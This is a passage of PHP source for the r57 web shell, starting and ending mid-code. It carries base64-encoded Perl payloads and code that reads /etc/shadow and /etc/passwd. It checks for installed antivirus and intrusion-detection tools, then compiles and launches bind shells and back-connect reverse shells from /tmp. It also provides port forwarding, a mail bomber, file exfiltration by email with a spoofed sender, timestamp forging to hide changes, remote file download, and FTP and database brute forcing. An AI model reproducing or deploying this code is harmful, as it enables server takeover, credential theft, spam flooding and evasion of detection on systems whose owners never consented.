DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
$prx_pl = "IyF1c3IvYmluL3BlcmwKdXNlIFNvY2tldDsKbXkgJHBvcnQgPSAkQVJHVlswXXx8MzEzMzc7Cm15ICRwcm90b2NvbCA9IGdldHByb3RvYn
luYW1lKCd0Y3AnKTsKbXkgJG15X2FkZHIgID0gc29ja2FkZHJfaW4gKCRwb3J0LCBJTkFERFJfQU5ZKTsKc29ja2V0IChTT0NLLCBBRl9JTkVULCBTT
0NLX1NUUkVBTSwgJHByb3RvY29sKSBvciBkaWUgInNvY2tldCgpOiAkISI7CnNldHNvY2tvcHQgKFNPQ0ssIFNPTF9TT0NLRVQsIFNPX1JFVVNFQURE
UiwxICkgb3IgZGllICJzZXRzb2Nrb3B0KCk6ICQhIjsKYmluZCAoU09DSywgJG15X2FkZHIpIG9yIGRpZSAiYmluZCgpOiAkISI7Cmxpc3RlbiAoU09
DSywgU09NQVhDT05OKSBvciBkaWUgImxpc3RlbigpOiAkISI7CiRTSUd7J0lOVCd9ID0gc3ViIHsKY2xvc2UgKFNPQ0spOwpleGl0Owp9Owp3aGlsZS
AoMSkgewpuZXh0IHVubGVzcyBteSAkcmVtb3RlX2FkZHIgPSBhY2NlcHQgKFNFU1NJT04sIFNPQ0spOwpteSAoJGZpc3QsICRtZXRob2QsICRyZW1vd
GVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IGFuYWx5emVfcmVxdWVzdCgpOwppZihvcGVuX2Nvbm5lY3Rpb24gKFJFTU9URSwgJHJlbW90ZV9ob3N0LCAk
cmVtb3RlX3BvcnQpID09IDApIHsKY2xvc2UgKFNFU1NJT04pOwpuZXh0Owp9CnByaW50IFJFTU9URSAkZmlyc3Q7CnByaW50IFJFTU9URSAiVXNlci1
BZ2VudDogR29vZ2xlYm90LzIuMSAoK2h0dHA6Ly93d3cuZ29vZ2xlLmNvbS9ib3QuaHRtbClcbiI7CndoaWxlICg8U0VTU0lPTj4pIHsKbmV4dCBpZi
AoL1Byb3h5LUNvbm5lY3Rpb246LyB8fCAvVXNlci1BZ2VudDovKTsKcHJpbnQgUkVNT1RFICRfOwpsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvK
TsKfQpwcmludCBSRU1PVEUgIlxuIjsKJGhlYWRlciA9IDE7CndoaWxlICg8UkVNT1RFPikgewpwcmludCBTRVNTSU9OICRfOwppZiAoJGhlYWRlcikg
eyAgICAgCmlmICgkaGVhZGVyICYmICRfID1+IC9eW1xzXHgwMF0qJC8pIHsKJGhlYWRlciA9IDA7Cn0KfQp9CmNsb3NlIChSRU1PVEUpOwpjbG9zZSA
oU0VTU0lPTik7Cn0KY2xvc2UgKFNPQ0spOwpzdWIgYW5hbHl6ZV9yZXF1ZXN0IHsKbXkgKCRmaXN0LCAkdXJsLCAkcmVtb3RlX2hvc3QsICRyZW1vdG
VfcG9ydCwgJG1ldGhvZCk7CiRmaXJzdCA9IDxTRVNTSU9OPjsKJHVybCA9ICgkZmlyc3QgPX4gbXwoaHR0cDovL1xTKyl8KVswXTsKKCRtZXRob2QsI
CRyZW1vdGVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IAooJGZpcnN0ID1+IG0hKEdFVCkgaHR0cDovLyhbXi86XSspOj8oXGQqKSEgKTsKaWYgKCEkcmVt
b3RlX2hvc3QpIHsKY2xvc2UoU0VTU0lPTik7CmV4aXQ7Cn0KJHJlbW90ZV9wb3J0ID0gImh0dHAiIHVubGVzcyAoJHJlbW90ZV9wb3J0KTsKJGZpcnN
0ID1+IHMvaHR0cDpcL1wvW15cL10rLy87CnJldHVybiAoJGZpcnN0LCAkbWV0aG9kLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7Cn0Kc3ViIG
9wZW5fY29ubmVjdGlvbiB7Cm15ICgkaG9zdCwgJHBvcnQpID0gQF9bMSwyXTsKbXkgKCRkZXN0X2FkZHIsICRjdXIpOwppZiAoJHBvcnQgIX4gL15cZ
CskLykgewokcG9ydCA9IChnZXRzZXJ2YnluYW1lKCRwb3J0LCAidGNwIikpWzJdOwokcG9ydCA9IDgwIHVubGVzcyAoJHBvcnQpOwp9CiRob3N0ID0g
aW5ldF9hdG9uICgkaG9zdCkgb3IgcmV0dXJuIDA7CiRkZXN0X2FkZHIgPSBzb2NrYWRkcl9pbiAoJHBvcnQsICRob3N0KTsKc29ja2V0ICgkX1swXSw
gQUZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90b2NvbCkgb3IgZGllICJzb2NrZXQoKSA6ICQhIjsKY29ubmVjdCAoJF9bMF0sICRkZXN0X2FkZHIpIG
9yIHJldHVybiAwOwokY3VyID0gc2VsZWN0KCRfWzBdKTsgIAokfCA9IDE7CnNlbGVjdCgkY3VyKTsKcmV0dXJuIDE7Cn0=";
if ($unix) { if (!isset($_COOKIE['uname'])) { $uname = ex('uname -a');
setcookie('uname', $uname);
} else { $uname = $_COOKIE['uname'];
} if (!isset($_COOKIE['id'])) { $id = ex('id');
setcookie('id', $id);
} else { $id = $_COOKIE['id'];
} if ($safe_mode) { $sysctl = '-';
} else if (isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl'];
} else { $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
if (empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease');
} if (empty($sysctl)) { $sysctl = '-';
} setcookie('sysctl', $sysctl);
} } echo $head;
echo '';
echo '| ' . ws(2) . '#r57 shell ' . $version . ' | ';
echo ws(2) . "" . date("d-m-Y H:i:s") . " Your IP: [" . gethostbyname($_SERVER["REMOTE_ADDR"]) . "]";
if (isset($_SERVER['X_FORWARDED_FOR'])) { echo " X_FORWARDED_FOR: [" . $_SERVER['X_FORWARDED_FOR'] . "]";
} if (isset($_SERVER['CLIENT_IP'])) { echo " CLIENT_IP: [" . $_SERVER['CLIENT_IP'] . "]";
} echo " Server IP: [" . gethostbyname($_SERVER["HTTP_HOST"]) . "]";
echo "
";
echo ws(2) . "PHP version: " . @phpversion() . "";
$curl_on = @function_exists('curl_version');
echo ws(2);
echo "cURL: " . (($curl_on) ? ("ON") : ("Kapali"));
echo "" . ws(2);
echo "MySQL: ";
$mysql_on = @function_exists('mysql_connect');
if ($mysql_on) { echo "ON";
} else { echo "Kapali";
} echo "" . ws(2);
echo "MSSQL: ";
$mssql_on = @function_exists('mssql_connect');
if ($mssql_on) { echo "ON";
} else { echo "Kapali";
} echo "" . ws(2);
echo "PostgreSQL: ";
$pg_on = @function_exists('pg_connect');
if ($pg_on) { echo "ON";
} else { echo "Kapali";
} echo "" . ws(2);
echo "Oracle: ";
$ora_on = @function_exists('ocilogon');
if ($ora_on) { echo "ON";
} else { echo "Kapali";
} echo "
" . ws(2);
echo "Safe_mode: ";
echo (($safe_mode) ? ("ON") : ("Kapali"));
echo "" . ws(2);
echo "Open_basedir: ";
if ($open_basedir) { if ('' == ($df = @ini_get('open_basedir'))) { echo "ini_get disable!";
} else { echo "$df";
};
} else { echo "NONE";
} echo ws(2) . "Safe_mode_exec_dir: ";
if (@function_exists('ini_get')) { if ('' == ($df = @ini_get('safe_mode_exec_dir'))) { echo "NONE";
} else { echo "$df";
};
} else { echo "ini_get disable!";
} echo ws(2) . "Safe_mode_include_dir: ";
if (@function_exists('ini_get')) { if ('' == ($df = @ini_get('safe_mode_include_dir'))) { echo "NONE";
} else { echo "$df";
};
} else { echo "ini_get disable!";
} echo "
" . ws(2);
echo "Disable functions : ";
$df = 'ini_get disable!';
if ((@function_exists('ini_get')) && ('' == ($df = @ini_get('disable_functions')))) { echo "NONE";
} else { echo "$df";
} $free = @diskfreespace($dir);
if (!$free) { $free = 0;
} $all = @disk_total_space($dir);
if (!$all) { $all = 0;
} echo "
" . ws(2) . "Free space : " . view_size($free) . " Total space: " . view_size($all) . "";
$ust = '';
if ($unix && !$safe_mode) { if (which('gcc')) { $ust.= "gcc,";
} if (which('cc')) { $ust.= "cc,";
} if (which('ld')) { $ust.= "ld,";
} if (which('php')) { $ust.= "php,";
} if (which('perl')) { $ust.= "perl,";
} if (which('python')) { $ust.= "python,";
} if (which('ruby')) { $ust.= "ruby,";
} if (which('make')) { $ust.= "make,";
} if (which('tar')) { $ust.= "tar,";
} if (which('nc')) { $ust.= "netcat,";
} if (which('locate')) { $ust.= "locate,";
} if (which('suidperl')) { $ust.= "suidperl,";
} } if (@function_exists('pcntl_exec')) { $ust.= "pcntl_exec,";
} if ($ust) { echo "
" . ws(2) . $lang[$language . '_text137'] . ": " . $ust . "";
} $ust = '';
if ($unix && !$safe_mode) { if (which('kav')) { $ust.= "kav,";
} if (which('nod32')) { $ust.= "nod32,";
} if (which('bdcored')) { $ust.= "bitdefender,";
} if (which('uvscan')) { $ust.= "mcafee,";
} if (which('sav')) { $ust.= "symantec,";
} if (which('drwebd')) { $ust = "drwebd,";
} if (which('clamd')) { $ust.= "clamd,";
} if (which('rkhunter')) { $ust.= "rkhunter,";
} if (which('chkrootkit')) { $ust.= "chkrootkit,";
} if (which('iptables')) { $ust.= "iptables,";
} if (which('ipfw')) { $ust.= "ipfw,";
} if (which('tripwire')) { $ust.= "tripwire,";
} if (which('shieldcc')) { $ust.= "stackshield,";
} if (which('portsentry')) { $ust.= "portsentry,";
} if (which('snort')) { $ust.= "snort,";
} if (which('ossec')) { $ust.= "ossec,";
} if (which('lidsadm')) { $ust.= "lidsadm,";
} if (which('tcplodg')) { $ust.= "tcplodg,";
} if (which('tripwire')) { $ust.= "tripwire,";
} if (which('sxid')) { $ust.= "sxid,";
} if (which('logcheck')) { $ust.= "logcheck,";
} if (which('logwatch')) { $ust.= "logwatch,";
} } if (@function_exists('apache_get_modules') && @in_array('mod_security', apache_get_modules())) { $ust.= "mod_security,";
} if ($ust) { echo "
" . ws(2) . $lang[$language . '_text138'] . ": $ust";
} echo "
" . ws(2) . "";
echo ws(2) . $lb . " phpinfo " . $rb;
echo ws(2) . $lb . " php.ini " . $rb;
echo ws(2) . $lb . " cpu " . $rb;
echo ws(2) . $lb . " mem " . $rb;
if (!$unix) { echo ws(2) . $lb . " systeminfo " . $rb;
} else { echo ws(2) . $lb . " syslog " . $rb;
echo ws(2) . $lb . " resolv " . $rb;
echo ws(2) . $lb . " hosts " . $rb;
echo ws(2) . $lb . " shadow " . $rb;
echo ws(2) . $lb . " passwd " . $rb;
} echo ws(2) . $lb . " tmp " . $rb;
echo ws(2) . $lb . " delete " . $rb;
if ($unix && !$safe_mode) { echo "
" . ws(2) . "";
echo ws(2) . $lb . " procinfo " . $rb;
echo ws(2) . $lb . " version " . $rb;
echo ws(2) . $lb . " free " . $rb;
echo ws(2) . $lb . " dmesg " . $rb;
echo ws(2) . $lb . " vmstat " . $rb;
echo ws(2) . $lb . " lspci " . $rb;
echo ws(2) . $lb . " lsdev " . $rb;
echo ws(2) . $lb . " interrupts " . $rb;
echo ws(2) . $lb . " realise1 " . $rb;
echo ws(2) . $lb . " realise2 " . $rb;
echo ws(2) . $lb . " lsattr " . $rb;
echo "
" . ws(2) . "";
echo ws(2) . $lb . " w " . $rb;
echo ws(2) . $lb . " who " . $rb;
echo ws(2) . $lb . " uptime " . $rb;
echo ws(2) . $lb . " last " . $rb;
echo ws(2) . $lb . " ps aux " . $rb;
echo ws(2) . $lb . " service " . $rb;
echo ws(2) . $lb . " ifconfig " . $rb;
echo ws(2) . $lb . " netstat " . $rb;
echo ws(2) . $lb . " fstab " . $rb;
echo ws(2) . $lb . " fdisk " . $rb;
echo ws(2) . $lb . " df -h " . $rb;
} echo ' |
';
echo $font;
if ($unix) { echo 'uname -a :' . ws(1) . '
sysctl :' . ws(1) . '
$OSTYPE :' . ws(1) . '
Server :' . ws(1) . '
id :' . ws(1) . '
pwd :' . ws(1) . '
';
echo " | ";
echo "";
echo ((!empty($uname)) ? (ws(3) . @substr($uname, 0, 120) . "
") : (ws(3) . @substr(@php_uname(), 0, 120) . "
"));
echo ws(3) . $sysctl . "
";
echo ws(3) . ex('echo $OSTYPE') . "
";
echo ws(3) . @substr($SERVER_SOFTWARE, 0, 120) . "
";
if (!empty($id)) { echo ws(3) . $id . "
";
} else if (@function_exists('posix_geteuid') && @function_exists('posix_getegid') && @function_exists('posix_getgrgid') && @function_exists('posix_getpwuid')) { $euserinfo = @posix_getpwuid(@posix_geteuid());
$egroupinfo = @posix_getgrgid(@posix_getegid());
echo ws(3) . 'uid=' . $euserinfo['uid'] . ' ( ' . $euserinfo['name'] . ' ) gid=' . $egroupinfo['gid'] . ' ( ' . $egroupinfo['name'] . ' )
';
} else echo ws(3) . "user=" . @get_current_user() . " uid=" . @getmyuid() . " gid=" . @getmygid() . "
";
echo ws(3) . $dir;
echo ws(3) . '( ' . perms(@fileperms($dir)) . ' )';
echo "";
} else { echo 'OS :' . ws(1) . '
Server :' . ws(1) . '
User :' . ws(1) . '
pwd :' . ws(1) . '
';
echo " | ";
echo "";
echo ws(3) . @substr(@php_uname(), 0, 120) . "
";
echo ws(3) . @substr($SERVER_SOFTWARE, 0, 120) . "
";
echo ws(3) . @getenv("USERNAME") . "
";
echo ws(3) . $dir;
echo "
";
} echo "";
echo " | ";
if (!empty($_POST['cmd']) && $_POST['cmd'] == "mail") { $res = mail($_POST['to'], $_POST['subj'], $_POST['text'], "From: " . $_POST['from'] . "\r\n");
err(6 + $res);
$_POST['cmd'] = "";
} if (!empty($_POST['cmd']) && $_POST['cmd'] == "mail_file" && !empty($_POST['loc_file'])) { if ($file = @fopen($_POST['loc_file'], "r")) { $filedump = @fread($file, @filesize($_POST['loc_file']));
@fclose($file);
} else if ($file = readzlib($_POST['loc_file'])) { $filedump = $file;
} else { err(1, $_POST['loc_file']);
$_POST['cmd'] = "";
} if (isset($_POST['cmd'])) { $filename = @basename($_POST['loc_file']);
$content_encoding = $mime_type = '';
compress($filename, $filedump, $_POST['compress']);
$attach = array("name" => $filename, "type" => $mime_type, "content" => $filedump);
if (empty($_POST['subj'])) { $_POST['subj'] = 'file from r57';
} if (empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com';
} $res = mailattach($_POST['to'], $_POST['from'], $_POST['subj'], $attach);
err(6 + $res);
$_POST['cmd'] = "";
} } if (!empty($_POST['cmd']) && $_POST['cmd'] == "mail_bomber" && !empty($_POST['mail_flood']) && !empty($_POST['mail_size'])) { for ($h = 1;
$h <= $_POST['mail_flood'];
$h++) { $res = mail($_POST['to'], $_POST['subj'], $_POST['text'] . str_repeat(" ", 1024 * $_POST['mail_size']), "From: " . $_POST['from'] . "\r\n");
} err(6 + $res);
$_POST['cmd'] = "";
} if (!empty($_POST['cmd']) && $_POST['cmd'] == "find_text") { $_POST['cmd'] = 'find ' . $_POST['s_dir'] . ' -name \'' . $_POST['s_mask'] . '\' | xargs grep -E \'' . $_POST['s_text'] . '\'';
} if (!empty($_POST['cmd']) && $_POST['cmd'] == "ch_") { switch ($_POST['what']) { case 'own': @chown($_POST['param1'], $_POST['param2']);
break;
case 'grp': @chgrp($_POST['param1'], $_POST['param2']);
break;
case 'mod': @chmod($_POST['param1'], intval($_POST['param2'], 8));
break;
} $_POST['cmd'] = "";
} if (!empty($_POST['cmd']) && $_POST['cmd'] == "mk") { switch ($_POST['what']) { case 'file': if ($_POST['action'] == "create") { if (@file_exists($_POST['mk_name']) || !$file = @fopen($_POST['mk_name'], "w")) { err(2, $_POST['mk_name']);
$_POST['cmd'] = "";
} else { @fclose($file);
$_POST['e_name'] = $_POST['mk_name'];
$_POST['cmd'] = "edit_file";
echo "" . $lang[$language . '_text61'] . " |
";
} } else if ($_POST['action'] == "delete") { if (unlink($_POST['mk_name'])) echo "" . $lang[$language . '_text63'] . " |
";
$_POST['cmd'] = "";
} break;
case 'dir': if ($_POST['action'] == "create") { if (@mkdir($_POST['mk_name'])) { $_POST['cmd'] = "";
echo "" . $lang[$language . '_text62'] . " |
";
} else { err(2, $_POST['mk_name']);
$_POST['cmd'] = "";
} } else if ($_POST['action'] == "delete") { if (@rmdir($_POST['mk_name'])) echo "" . $lang[$language . '_text64'] . " |
";
$_POST['cmd'] = "";
} break;
} } if (!empty($_POST['cmd']) && $_POST['cmd'] == "touch") { if (!$_POST['file_name_r']) { $datar = $_POST['day'] . " " . $_POST['month'] . " " . $_POST['year'] . " " . $_POST['chasi'] . " hours " . $_POST['minutes'] . " minutes " . $_POST['second'] . " seconds";
$datar = @strtotime($datar);
@touch($_POST['file_name'], $datar, $datar);
} else { @touch($_POST['file_name'], @filemtime($_POST['file_name_r']), @filemtime($_POST['file_name_r']));
} $_POST['cmd'] = "";
} if (!empty($_POST['cmd']) && $_POST['cmd'] == "edit_file" && !empty($_POST['e_name'])) { if (!$file = @fopen($_POST['e_name'], "r+")) { $filedump = @fread($file, @filesize($_POST['e_name']));
@fclose($file);
$only_read = 1;
} if ($file = @fopen($_POST['e_name'], "r")) { $filedump = @fread($file, @filesize($_POST['e_name']));
@fclose($file);
} else if ($file = readzlib($_POST['e_name'])) { $filedump = $file;
$only_read = 1;
} else { err(1, $_POST['e_name']);
$_POST['cmd'] = "";
} if (isset($_POST['cmd'])) { echo $table_up3;
echo $font;
echo "";
echo " ";
exit();
} } if (!empty($_POST['cmd']) && $_POST['cmd'] == "save_file") { $mtime = @filemtime($_POST['e_name']);
if ((!$file = @fopen($_POST['e_name'], "w")) && (!function_exists('file_put_contents'))) { err(0, $_POST['e_name']);
} else { if ($unix) $_POST['e_text'] = @str_replace("\r\n", "\n", $_POST['e_text']);
@fwrite($file, $_POST['e_text']) or @fputs($file, $_POST['e_text']) or @file_put_contents($_POST['e_name'], $_POST['e_text']);
@touch($_POST['e_name'], $mtime, $mtime);
$_POST['cmd'] = "";
echo "" . $lang[$language . '_text45'] . " |
";
} } if (!empty($_POST['proxy_port']) && ($_POST['use'] == "Perl")) { cf("/tmp/prxpl", $prx_pl);
$p2 = which("perl");
$blah = ex($p2 . " /tmp/prxpl " . $_POST['proxy_port'] . " &");
$_POST['cmd'] = "ps -aux | grep prxpl";
} if (!empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == "C")) { cf("/tmp/bd.c", $port_bind_bd_c);
$blah = ex("gcc -o /tmp/bd /tmp/bd.c");
@unlink("/tmp/bd.c");
$blah = ex("/tmp/bd " . $_POST['port'] . " " . $_POST['bind_pass'] . " &");
$_POST['cmd'] = "ps -aux | grep bd";
} if (!empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == "Perl")) { cf("/tmp/bdpl", $port_bind_bd_pl);
$p2 = which("perl");
$blah = ex($p2 . " /tmp/bdpl " . $_POST['port'] . " &");
$_POST['cmd'] = "ps -aux | grep bdpl";
} if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use'] == "Perl")) { cf("/tmp/back", $back_connect);
$p2 = which("perl");
$blah = ex($p2 . " /tmp/back " . $_POST['ip'] . " " . $_POST['port'] . " &");
$_POST['cmd'] = "echo \"Now script try connect to " . $_POST['ip'] . " port " . $_POST['port'] . " ...\"";
} if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use'] == "C")) { cf("/tmp/back.c", $back_connect_c);
$blah = ex("gcc -o /tmp/backc /tmp/back.c");
@unlink("/tmp/back.c");
$blah = ex("/tmp/backc " . $_POST['ip'] . " " . $_POST['port'] . " &");
$_POST['cmd'] = "echo \"Now script try connect to " . $_POST['ip'] . " port " . $_POST['port'] . " ...\"";
} if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use'] == "Perl")) { cf("/tmp/dp", $datapipe_pl);
$p2 = which("perl");
$blah = ex($p2 . " /tmp/dp " . $_POST['local_port'] . " " . $_POST['remote_host'] . " " . $_POST['remote_port'] . " &");
$_POST['cmd'] = "ps -aux | grep dp";
} if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use'] == "C")) { cf("/tmp/dpc.c", $datapipe_c);
$blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
@unlink("/tmp/dpc.c");
$blah = ex("/tmp/dpc " . $_POST['local_port'] . " " . $_POST['remote_port'] . " " . $_POST['remote_host'] . " &");
$_POST['cmd'] = "ps -aux | grep dpc";
} if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']];
} for ($upl = 0;
$upl <= 16;
$upl++) { if (!empty($HTTP_POST_FILES['userfile' . $upl]['name'])) { if (!empty($_POST['new_name']) && ($upl == 0)) { $nfn = $_POST['new_name'];
} else { $nfn = $HTTP_POST_FILES['userfile' . $upl]['name'];
} @move_uploaded_file($HTTP_POST_FILES['userfile' . $upl]['tmp_name'], $_POST['dir'] . "/" . $nfn) or print ("Error uploading file " . $HTTP_POST_FILES['userfile' . $upl]['name'] . " ");
} } if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file'])) { switch ($_POST['with']) { case 'fopen': $datafile = @implode("", @file($_POST['rem_file']));
if ($datafile) { $w_file = @fopen($_POST['loc_file'], "wb") or @function_exists('file_put_contents') or err(0);
if ($w_file) { @fwrite($w_file, $datafile) or @fputs($w_file, $datafile) or @file_put_contents($_POST['loc_file'], $datafile);
@fclose($w_file);
} } $_POST['cmd'] = '';
break;
case 'wget': $_POST['cmd'] = which('wget') . " " . $_POST['rem_file'] . " -O " . $_POST['loc_file'] . "";
break;
case 'fetch': $_POST['cmd'] = which('fetch') . " -o " . $_POST['loc_file'] . " -p " . $_POST['rem_file'] . "";
break;
case 'lynx': $_POST['cmd'] = which('lynx') . " -source " . $_POST['rem_file'] . " > " . $_POST['loc_file'] . "";
break;
case 'links': $_POST['cmd'] = which('links') . " -source " . $_POST['rem_file'] . " > " . $_POST['loc_file'] . "";
break;
case 'GET': $_POST['cmd'] = which('GET') . " " . $_POST['rem_file'] . " > " . $_POST['loc_file'] . "";
break;
case 'curl': $_POST['cmd'] = which('curl') . " " . $_POST['rem_file'] . " -o " . $_POST['loc_file'] . "";
break;
} } if (!empty($_POST['cmd']) && (($_POST['cmd'] == "ftp_file_up") || ($_POST['cmd'] == "ftp_file_down"))) { list($ftp_server, $ftp_port) = split(":", $_POST['ftp_server_port']);
if (empty($ftp_port)) { $ftp_port = 21;
} $connection = @ftp_connect($ftp_server, $ftp_port, 10);
if (!$connection) { err(3);
} else { if (!@ftp_login($connection, $_POST['ftp_login'], $_POST['ftp_password'])) { err(4);
} else { if ($_POST['cmd'] == "ftp_file_down") { if (chop($_POST['loc_file']) == $dir) { $_POST['loc_file'] = $dir . ((!$unix) ? ('\\') : ('/')) . basename($_POST['ftp_file']);
} @ftp_get($connection, $_POST['loc_file'], $_POST['ftp_file'], $_POST['mode']);
} if ($_POST['cmd'] == "ftp_file_up") { @ftp_put($connection, $_POST['ftp_file'], $_POST['loc_file'], $_POST['mode']);
} } } @ftp_close($connection);
$_POST['cmd'] = "";
} if (!empty($_POST['cmd']) && (($_POST['cmd'] == "ftp_brute") || ($_POST['cmd'] == "db_brute"))) { if ($_POST['cmd'] == "ftp_brute") { list($ftp_server, $ftp_port) = split(":", $_POST['ftp_server_port']);
if (empty($ftp_port)) { $ftp_port = 21;
} $connection = @ftp_connect($ftp_server, $ftp_port, 10);
} else if ($_POST['cmd'] == "db_brute") { $connection = 1;
} if (!$connection) { err(3);
$_POST['cmd'] = "";
} else if (($_POST['brute_method'] == 'passwd') && (!$users = get_users('/etc/passwd'))) { echo "" . $lang[$language . '_text96'] . " |
";
$_POST['cmd'] = "";
} else if (($_POST['brute_method'] == 'dic') && (!$users = get_users($_POST['dictionary']))) { echo "";
$_POST['cmd'] = "";
} if ($_POST['cmd'] == "ftp_brute") { @ftp_close($connection);
} } echo $table_up3;
if (empty($_POST['cmd']) && !$safe_mode && !$open_basedir) { $_POST['cmd'] = (!$unix) ? ("dir") : ("ls -lia");
} else if (empty($_POST['cmd']) && ($safe_mode || $open_basedir)) { $_POST['cmd'] = "safe_dir";
} echo $font . $lang[$language . '_text1'] . ": " . $_POST['cmd'] . "| ";
echo "";
echo " |
";
echo "";
function div_title($title, $id) { return '' . $title . '';
} function div($id) { if (isset($_COOKIE[$id]) && ($_COOKIE[$id] == 0)) return '';
$divid = array('id5', 'id6', 'id8', 'id9', 'id10', 'id11', 'id16', 'id24', 'id25', 'id26', 'id27', 'id28', 'id29', 'id33', 'id34', 'id35', 'id37', 'id38');
if (empty($_COOKIE[$id]) && @in_array($id, $divid)) return ' ';
return ' ';
} if (!$safe_mode) { echo $fs . $table_up1 . div_title($lang[$language . '_text2'], 'id1') . $table_up2 . div('id1') . $ts;
echo sr(15, "" . $lang[$language . '_text3'] . $arrow . "", in('text', 'cmd', 85, ''));
echo sr(15, "" . $lang[$language . '_text4'] . $arrow . "", in('text', 'dir', 85, $dir) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt1']));
echo $te . ' ' . $table_end1 . $fe;
} else { echo $fs . $table_up1 . div_title($lang[$language . '_text28'], 'id2') . $table_up2 . div('id2') . $ts;
echo sr(15, " " . $lang[$language . '_text4'] . $arrow . "", in('text', 'dir', 85, $dir) . in('hidden', 'cmd', 0, 'safe_dir') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt6']));
echo $te . ' ' . $table_end1 . $fe;
} echo $fs . $table_up1 . div_title($lang[$language . '_text42'], 'id3') . $table_up2 . div('id3') . $ts;
echo sr(15, " " . $lang[$language . '_text43'] . $arrow . "", in('text', 'e_name', 85, $dir) . in('hidden', 'cmd', 0, 'edit_file') . in('hidden', 'dir', 0, $dir) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt11']));
echo $te . ' " . div('id10') . "";
echo in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'php_eval');
echo "
" . ws(1) . in('submit', 'submit', 0, $lang[$language . '_butt1']);
echo " ";
echo $table_end1 . $fe;
if ($safe_mode || $open_basedir) { echo $fs . $table_up1 . div_title($lang[$language . '_text34'], 'id11') . $table_up2 . div('id11') . $ts;
echo "";
echo sr(15, "" . $lang[$language . '_text30'] . $arrow . "", in('text', 'test2_file', 85, (!empty($_POST['test2_file']) ? ($_POST['test2_file']) : ("/etc/passwd"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test2') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
echo $te . '' . $table_end1 . $fe;
} if (($safe_mode || $open_basedir) && $curl_on && @version_compare(@phpversion(), "5.2.0") <= 0) { echo $fs . $table_up1 . div_title($lang[$language . '_text33'], 'id12') . $table_up2 . div('id12') . $ts;
echo sr(15, "" . $lang[$language . '_text30'] . $arrow . "", in('text', 'test1_file', 85, (!empty($_POST['test1_file']) ? ($_POST['test1_file']) : ("/etc/passwd"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test1') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
echo $te . '' . $table_end1 . $fe;
} if (($safe_mode || $open_basedir) && $mysql_on) { echo $fs . $table_up1 . div_title($lang[$language . '_text35'], 'id13') . $table_up2 . div('id13') . $ts;
echo sr(15, "" . $lang[$language . '_text36'] . $arrow . "", in('text', 'test3_md', 15, (!empty($_POST['test3_md']) ? ($_POST['test3_md']) : ("mysql"))) . ws(4) . "" . $lang[$language . '_text37'] . $arrow . "" . in('text', 'test3_ml', 15, (!empty($_POST['test3_ml']) ? ($_POST['test3_ml']) : ("root"))) . ws(4) . "" . $lang[$language . '_text38'] . $arrow . "" . in('text', 'test3_mp', 15, (!empty($_POST['test3_mp']) ? ($_POST['test3_mp']) : ("password"))) . ws(4) . "" . $lang[$language . '_text14'] . $arrow . "" . in('text', 'test3_port', 15, (!empty($_POST['test3_port']) ? ($_POST['test3_port']) : ("3306"))));
echo sr(15, "" . $lang[$language . '_text30'] . $arrow . "", in('text', 'test3_file', 96, (!empty($_POST['test3_file']) ? ($_POST['test3_file']) : ("/etc/passwd"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test3') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
echo $te . '' . $table_end1 . $fe;
} if (($safe_mode || $open_basedir) && $mssql_on) { echo $fs . $table_up1 . div_title($lang[$language . '_text85'], 'id14') . $table_up2 . div('id14') . $ts;
echo sr(15, "" . $lang[$language . '_text36'] . $arrow . "", in('text', 'test4_md', 15, (!empty($_POST['test4_md']) ? ($_POST['test4_md']) : ("master"))) . ws(4) . "" . $lang[$language . '_text37'] . $arrow . "" . in('text', 'test4_ml', 15, (!empty($_POST['test4_ml']) ? ($_POST['test4_ml']) : ("sa"))) . ws(4) . "" . $lang[$language . '_text38'] . $arrow . "" . in('text', 'test4_mp', 15, (!empty($_POST['test4_mp']) ? ($_POST['test4_mp']) : ("password"))) . ws(4) . "" . $lang[$language . '_text14'] . $arrow . "" . in('text', 'test4_port', 15, (!empty($_POST['test4_port']) ? ($_POST['test4_port']) : ("1433"))));
